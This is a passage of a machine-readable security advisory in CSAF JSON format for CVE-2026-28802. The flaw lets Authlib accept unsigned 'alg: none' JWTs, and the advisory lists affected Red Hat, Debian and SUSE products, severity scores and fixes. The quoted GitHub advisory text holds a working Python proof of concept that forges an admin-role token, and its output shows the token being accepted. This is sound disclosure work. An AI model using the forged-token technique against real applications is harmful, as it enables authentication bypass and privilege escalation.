"pkg:oci/quay-container-security-operator-rhel8@sha256%3Aa5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773765467" } } }, { "category": "product_version_range", "name": "vers:oci/1773931180", "product": { "name": "vers:oci/1773931180", "product_id": "CSAFPID-5875338", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Ad97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773931180" } } }, { "category": "product_version_range", "name": "vers:oci/1774021695", "product": { "name": "vers:oci/1774021695", "product_id": "CSAFPID-5903539", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Aedd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942?arch=s390x&repository_url=registry.redhat.io/quay&tag=1774021695" } } } ], "category": "product_name", "name": "quay-container-security-operator-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773775889", "product": { "name": "vers:oci/1773775889", "product_id": "CSAFPID-5846438", "product_identification_helper": { "purl": "pkg:oci/quay-operator-bundle@sha256%3Af4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773775889" } } }, { "category": "product_version_range", "name": "vers:oci/1773939659", "product": { "name": "vers:oci/1773939659", "product_id": "CSAFPID-5875339", "product_identification_helper": { "purl": "pkg:oci/quay-operator-bundle@sha256%3A7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773939659" } } }, { "category": "product_version_range", "name": "vers:oci/1774022285", "product": { "name": "vers:oci/1774022285", "product_id": "CSAFPID-5903540", "product_identification_helper": { "purl": "pkg:oci/quay-operator-bundle@sha256%3Ae165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774022285" } } } ], "category": "product_name", "name": "quay-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773761676", "product": { "name": "vers:oci/1773761676", "product_id": "CSAFPID-5846439", "product_identification_helper": { "purl": "pkg:oci/quay-operator-rhel8@sha256%3Add1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1?arch=arm64&repository_url=registry.redhat.io/quay&tag=1773761676" } } }, { "category": "product_version_range", "name": "vers:oci/1773931187", "product": { "name": "vers:oci/1773931187", "product_id": "CSAFPID-5875340", "product_identification_helper": { "purl": "pkg:oci/quay-operator-rhel8@sha256%3Af5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773931187" } } }, { "category": "product_version_range", "name": "vers:oci/1774021722", "product": { "name": "vers:oci/1774021722", "product_id": "CSAFPID-5903541", "product_identification_helper": { "purl": "pkg:oci/quay-operator-rhel8@sha256%3Ade004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774021722" } } } ], "category": "product_name", "name": "quay-operator-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773771962", "product": { "name": "vers:oci/1773771962", "product_id": "CSAFPID-5846430", "product_identification_helper": { "purl": "pkg:oci/quay-rhel8@sha256%3Ae39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773771962" } } }, { "category": "product_version_range", "name": "vers:oci/1773936323", "product": { "name": "vers:oci/1773936323", "product_id": "CSAFPID-5875331", "product_identification_helper": { "purl": "pkg:oci/quay-rhel8@sha256%3Add567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773936323" } } }, { "category": "product_version_range", "name": "vers:oci/1773971077", "product": { "name": "vers:oci/1773971077", "product_id": "CSAFPID-5903532", "product_identification_helper": { "purl": "pkg:oci/quay-rhel8@sha256%3Af6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773971077" } } } ], "category": "product_name", "name": "quay-rhel8" } ], "category": "product_family", "name": "Red Hat Quay" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/6", "product": { "name": "vers:rpm/6", "product_id": "CSAFPID-1439313", "product_identification_helper": { "cpe": "cpe:/a:redhat:satellite:6" } } } ], "category": "product_name", "name": "Red Hat Satellite 6" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222639" } } ], "category": "product_name", "name": "foreman-mcp-server-rhel9" } ], "category": "product_family", "name": "Red Hat Satellite 6" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5035448" } } ], "category": "product_name", "name": "lightspeed-chatbot-rhel9" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1455906" } } ], "category": "product_name", "name": "quay-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5355695" } } ], "category": "product_name", "name": "quay-rhel9" } ], "category": "product_family", "name": "Red Hat Quay 3" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/1.6.5", "product": { "name": "vers:unknown/1.6.5", "product_id": "CSAFPID-5352550", "product_identification_helper": { "purl": "pkg:pypi/authlib@1.6.5" } } }, { "category": "product_version_range", "name": "vers:unknown/1.6.6", "product": { "name": "vers:unknown/1.6.6", "product_id": "CSAFPID-5760072", "product_identification_helper": { "purl": "pkg:pypi/authlib@1.6.6" } } }, { "category": "product_version_range", "name": "vers:unknown/>=1.6.5|<1.6.7", "product": { "name": "vers:unknown/>=1.6.5|<1.6.7", "product_id": "CSAFPID-5760073", "product_identification_helper": { "cpe": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "Authlib" } ], "category": "vendor", "name": "Authlib" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/unknown", "product": { "name": "vers:unknown/unknown", "product_id": "CSAFPID-1317174", "product_identification_helper": { "cpe": "cpe:/o:suse:suse_linux:-" } } } ], "category": "product_name", "name": "SuSE Linux" } ], "category": "vendor", "name": "SUSE" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=1.6.5|<=1.6.6", "product": { "name": "vers:unknown/>=1.6.5|<=1.6.6", "product_id": "CSAFPID-5970754" } } ], "category": "product_name", "name": "authlib" } ], "category": "vendor", "name": "unknown" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/*", "product": { "name": "vers:deb/*", "product_id": "CSAFPID-5768417" } } ], "category": "product_name", "name": "python-authlib" } ], "category": "product_family", "name": "bookworm" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1405218" } } ], "category": "product_name", "name": "python-authlib" } ], "category": "product_family", "name": "bullseye" } ], "category": "vendor", "name": "Debian" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-28802", "cwe": { "id": "CWE-347", "name": "Improper Verification of Cryptographic Signature" }, "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "CSAFPID-5846431", "CSAFPID-5846432", "CSAFPID-5846433", "CSAFPID-5846434", "CSAFPID-5846435", "CSAFPID-5846436", "CSAFPID-5846437", "CSAFPID-5846438", "CSAFPID-5846439", "CSAFPID-5875332", "CSAFPID-5875333", "CSAFPID-5875334", "CSAFPID-5875335", "CSAFPID-5875336", "CSAFPID-5875337", "CSAFPID-5875338", "CSAFPID-5875339", "CSAFPID-5875340", "CSAFPID-5903533", "CSAFPID-5903534", "CSAFPID-5903535", "CSAFPID-5903536", "CSAFPID-5903537", "CSAFPID-5903538", "CSAFPID-5903539", "CSAFPID-5903540", "CSAFPID-5903541", "CSAFPID-5973066", "CSAFPID-5973067", "CSAFPID-5973068", "CSAFPID-5973069", "CSAFPID-5973070", "CSAFPID-5973071", "CSAFPID-5973072", "CSAFPID-5973073", "CSAFPID-5973074", "CSAFPID-5973075", "CSAFPID-5973076", "CSAFPID-5973077", "CSAFPID-5973078", "CSAFPID-5973079", "CSAFPID-5973080", "CSAFPID-5973081", "CSAFPID-5973082", "CSAFPID-5973083", "CSAFPID-5973084", "CSAFPID-5973085", "CSAFPID-5973086", "CSAFPID-5973087", "CSAFPID-5973088", "CSAFPID-5973089", "CSAFPID-5973090", "CSAFPID-5973091", "CSAFPID-5973092", "CSAFPID-5973066", "CSAFPID-5973067", "CSAFPID-5973068", "CSAFPID-5973069", "CSAFPID-5973070", "CSAFPID-5973071", "CSAFPID-5973072", "CSAFPID-5973073", "CSAFPID-5973074", "CSAFPID-5973075", "CSAFPID-5973078", "CSAFPID-5973079", "CSAFPID-5973080", "CSAFPID-5973081", "CSAFPID-5973082", "CSAFPID-5973083", "CSAFPID-5973084", "CSAFPID-5973085", "CSAFPID-5973086", "CSAFPID-5973087", "CSAFPID-5973088", "CSAFPID-5973089", "CSAFPID-5973090", "CSAFPID-5973091", "CSAFPID-5973092", "CSAFPID-5984227" ] } ], "notes": [ { "category": "description", "text": "### Summary\nAfter upgrading the library from 1.5.2 to 1.6.0 (and the latest 1.6.5) it was noticed that previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected. \n\n### Details\nIt was likely introduced in this commit:\nhttps://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75\n\n### PoC\n```\nfrom authlib.jose import jwt, JsonWebKey\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.backends import default_backend\nimport json\nimport base64\n\n\ndef create_jwks():\n private_key = rsa.generate_private_key(\n public_exponent=65537, key_size=2048, backend=default_backend()\n )\n public_pem = private_key.public_key().public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n jwk = JsonWebKey.import_key(public_pem).as_dict()\n jwk[\"kid\"] = \"test-key-001\"\n jwk[\"use\"] = \"sig\"\n jwk[\"alg\"] = \"RS256\"\n jwks = {\"keys\": [jwk]}\n return jwks\n\n\ndef create_forged_token_with_alg_none():\n forged_header = {\"alg\": \"none\"}\n forged_payload = {\n \"sub\": \"user123\",\n \"role\": \"admin\",\n \"iat\": 1735603200,\n }\n\n header_b64 = base64.urlsafe_b64encode(\n json.dumps(forged_header).encode(\"utf-8\")\n ).rstrip(b\"=\")\n\n payload_b64 = base64.urlsafe_b64encode(\n json.dumps(forged_payload).encode(\"utf-8\")\n ).rstrip(b\"=\")\n\n forged_token = header_b64 + b\".\" + payload_b64 + b\".\"\n return forged_token\n\n\njwks = create_jwks()\nforged_token = create_forged_token_with_alg_none()\ntry:\n claims = jwt.decode(forged_token, jwks)\n print(f\"VULNERABLE: Forged token (alg:none) accepted: role={claims['role']}\")\nexcept Exception as e:\n print(f\"SECURE: Token rejected - {type(e).__name__}\")\n```\n\nOutput:\n```\npip install -q authlib==1.5.2\npython3 authlib_alg_none_vulnerability.py \nSECURE: Token rejected - BadSignatureError\npip install -q authlib==1.6.5\npython3 authlib_alg_none_vulnerability.py \nVULNERABLE: Forged token (alg:none) accepted: role=admin\n```\n\n### Impact\nUsers of the library are likely not aware that they now need to check the provided headers and disallow `alg: none` usage, it is not obvious from the release notes that any action needs to be taken. As a best-practice, the library should adopt a 'secure by default' stance and default to rejecting it and allow the application to provide an algorithm whitelist.\n\nApplications using this library for authentication or authorization may accept malicious, forged JWTs, leading to:\n- Authentication bypass\n- Privilege escalation\n- Unauthorized access\n- Modification of application data", "title": "github - https://github.com/advisories/GHSA-7wc2-qxgw-g8gg" }, { "category": "description", "text": "### Summary\nAfter upgrading the library from 1.5.2 to 1.6.0 (and the latest 1.6.5) it was noticed that previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected. \n\n### Details\nIt was likely introduced in this commit:\nhttps://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75\n\n### PoC\n```\nfrom authlib.jose import jwt, JsonWebKey\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.backends import default_backend\nimport json\nimport base64\n\n\ndef create_jwks():\n private_key = rsa.generate_private_key(\n public_exponent=65537, key_size=2048, backend=default_backend()\n )\n public_pem = private_key.public_key().public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n jwk = JsonWebKey.import_key(public_pem).as_dict()\n jwk[\"kid\"] = \"test-key-001\"\n jwk[\"use\"] = \"sig\"\n jwk[\"alg\"] = \"RS256\"\n jwks = {\"keys\": [jwk]}\n return jwks\n\n\ndef create_forged_token_with_alg_none():\n forged_header = {\"alg\": \"none\"}\n forged_payload = {\n \"sub\": \"user123\",\n \"role\": \"admin\",\n \"iat\": 1735603200,\n }\n\n header_b64 = base64.urlsafe_b64encode(\n json.dumps(forged_header).encode(\"utf-8\")\n ).rstrip(b\"=\")\n\n payload_b64 = base64.urlsafe_b64encode(\n json.dumps(forged_payload).encode(\"utf-8\")\n ).rstrip(b\"=\")\n\n forged_token = header_b64 + b\".\" + payload_b64 + b\".\"\n return forged_token\n\n\njwks = create_jwks()\nforged_token = create_forged_token_with_alg_none()\ntry:\n claims = jwt.decode(forged_token, jwks)\n print(f\"VULNERABLE: Forged token (alg:none) accepted: role={claims['role']}\")\nexcept Exception as e:\n print(f\"SECURE: Token rejected - {type(e).__name__}\")\n```\n\nOutput:\n```\npip install -q authlib==1.5.2\npython3 authlib_alg_none_vulnerability.py \nSECURE: Token rejected - BadSignatureError\npip install -q authlib==1.6.5\npython3 authlib_alg_none_vulnerability.py \nVULNERABLE: Forged token (alg:none) accepted: role=admin\n```\n\n### Impact\nUsers of the library are likely not aware that they now need to check the provided headers and disallow `alg: none` usage, it is not obvious from the release notes that any action needs to be taken. As a best-practice, the library should adopt a 'secure by default' stance and default to rejecting it and allow the application to provide an algorithm whitelist.\n\nApplications using this library for authentication or authorization may accept malicious, forged JWTs, leading to:\n- Authentication bypass\n- Privilege escalation\n- Unauthorized access\n- Modification of application data", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-7wc2-qxgw-g8gg.json?alt=media" }, { "category": "description", "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. From version 1.6.5 to before version 1.6.7, previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.. This issue has been patched in version 1.6.7.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-28802" }, { "category": "description", "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. From version 1.6.5 to before version 1.6.7, previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.. This issue has been patched in version 1.6.7.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-28802" }, { "category": "description", "text": "No description is available for this CVE.", "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-28802" }, { "category": "description", "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. From version 1.6.5 to before version 1.6.7, previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.. This issue has been patched in version 1.6.7.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-28802" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.", "title": "redhat - https://access.redhat.com/errata/RHSA-2026:4942" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:5168.json" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:5665.json" }, { "category": "description", "text": "Affected versions of the authlib package are vulnerable to Improper Input Validation because they accept JWTs with alg: none and an empty signature during verification. The issue occurs in authlib.jose.jwt.decode(), which accepts a forged token when the JWT header specifies alg: none, treating an unsigned token as valid rather than rejecting it with a signature verification error.", "title": "pyupio - https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6309.json" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6404.json" }, { "category": "other", "text": "0.00022", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P", "title": "CVSSV4" }, { "category": "other", "text": "7.7", "title": "CVSSV4 base score" }, { "category": "other", "text": "4.7", "title": "NCSC Score" }, { "category": "other", "text": "The value of the most recent CVSS (V3) score, VENDOR FIX as product remediation category, There is product data available from source Certbundde, There is product data available from a private source, There is cvss data available from a private source", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "Is related to (a version of) product Amazon Linux, The value of the most recent EPSS score, There is exploit data available from source Nvd, Is related to a product by vendor Unknown", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "fixed": [ "CSAFPID-5846430", "CSAFPID-5875331", "CSAFPID-5903532", "CSAFPID-5973065" ], "known_affected": [ "CSAFPID-5352550", "CSAFPID-5760072", "CSAFPID-5760073", "CSAFPID-1439313", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1508257", "CSAFPID-5035448", "CSAFPID-5222639", "CSAFPID-5355695", "CSAFPID-1405218", "CSAFPID-5970754", "CSAFPID-1384077", "CSAFPID-5354794", "CSAFPID-1317174", "CSAFPID-1317175", "CSAFPID-1330296" ], "known_not_affected": [ "CSAFPID-5768417", "CSAFPID-5846431", "CSAFPID-5846432", "CSAFPID-5846433", "CSAFPID-5846434", "CSAFPID-5846435", "CSAFPID-5846436", "CSAFPID-5846437", "CSAFPID-5846438", "CSAFPID-5846439", "CSAFPID-5875332", "CSAFPID-5875333", "CSAFPID-5875334", "CSAFPID-5875335", "CSAFPID-5875336", "CSAFPID-5875337", "CSAFPID-5875338", "CSAFPID-5875339", "CSAFPID-5875340", "CSAFPID-5903533", "CSAFPID-5903534", "CSAFPID-5903535", "CSAFPID-5903536", "CSAFPID-5903537", "CSAFPID-5903538", "CSAFPID-5903539", "CSAFPID-5903540", "CSAFPID-5903541", "CSAFPID-5973066", "CSAFPID-5973067", "CSAFPID-5973068", "CSAFPID-5973069", "CSAFPID-5973070", "CSAFPID-5973071", "CSAFPID-5973072", "CSAFPID-5973073", "CSAFPID-5973074", "CSAFPID-5973075", "CSAFPID-5973076", "CSAFPID-5973077", "CSAFPID-5973078", "CSAFPID-5973079", "CSAFPID-5973080", "CSAFPID-5973081", "CSAFPID-5973082", "CSAFPID-5973083", "CSAFPID-5973084", "CSAFPID-5973085", "CSAFPID-5973086", "CSAFPID-5973087", "CSAFPID-5973088", "CSAFPID-5973089", "CSAFPID-5973090", "CSAFPID-5973091", "CSAFPID-5973092", "CSAFPID-5984227" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-7wc2-qxgw-g8gg" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-7wc2-qxgw-g8gg" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-7wc2-qxgw-g8gg.json?alt=media" }, { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-28802" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-28802" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/28xxx/CVE-2026-28802.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-28802" }, { "category": "external", "summary": "Source raw - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28802.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28802" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-28802" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/errata/RHSA-2026:4942" }, { "category": "external", "summary": "Source raw - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:4942.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:5168.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:5665.json" }, { "category": "external", "summary": "Source - pyupio", "url": "https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "external", "summary": "Source - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0935.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6309.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6404.json" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-7wc2-qxgw-g8gg" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-28802" }, { "category": "external", "summary": "Reference - github; osv; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-28802" }, { "category": "external", "summary": "Reference - redhat", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445120" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/errata/RHSA-2026:4942" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-61726" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-61728" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-61729" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-68121" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-24049" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-25639" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-25990" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-26996" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27628" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27904" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27962" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/updates/classification/" }, { "category": "external", "summary": "Reference - redhat", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_4942.json" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/errata/RHSA-2026:5168" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-69873" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-26007" }, { "category": "external", "summary": "Reference - redhat", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5168.json" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/errata/RHSA-2026:5665" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27606" }, { "category": "external", "summary": "Reference - redhat", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5665.json" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0935.json" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0935" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://access.redhat.com/errata/RHSA-2026:6308" }, { "category": "external", "summary": "Reference - certbundde; redhat", "url": "https://access.redhat.com/errata/RHSA-2026:6309" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-69223" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-1615" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-28498" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-29074" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-30827" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-30922" }, { "category": "external", "summary": "Reference - redhat", "url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/html/release_notes/patch_releases" }, { "category": "external", "summary": "Reference - redhat", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6309.json" }, { "category": "external", "summary": "Reference - certbundde; redhat", "url": "https://access.redhat.com/errata/RHSA-2026:6404" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://access.redhat.com/errata/RHSA-2026:6278" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://alas.aws.amazon.com/AL2/ALAS2-2026-3215.html" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://lists.suse.com/pipermail/sle-security-updates/2026-April/025088.html" }, { "category": "external", "summary": "Reference - redhat", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6404.json" } ], "remediations": [ { "category": "mitigation", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.", "product_ids": [ "CSAFPID-1439313", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1508257", "CSAFPID-5035448", "CSAFPID-5222639", "CSAFPID-5355695" ] }, { "category": "vendor_fix", "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "CSAFPID-5256659", "CSAFPID-5846430" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2026:4942" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do 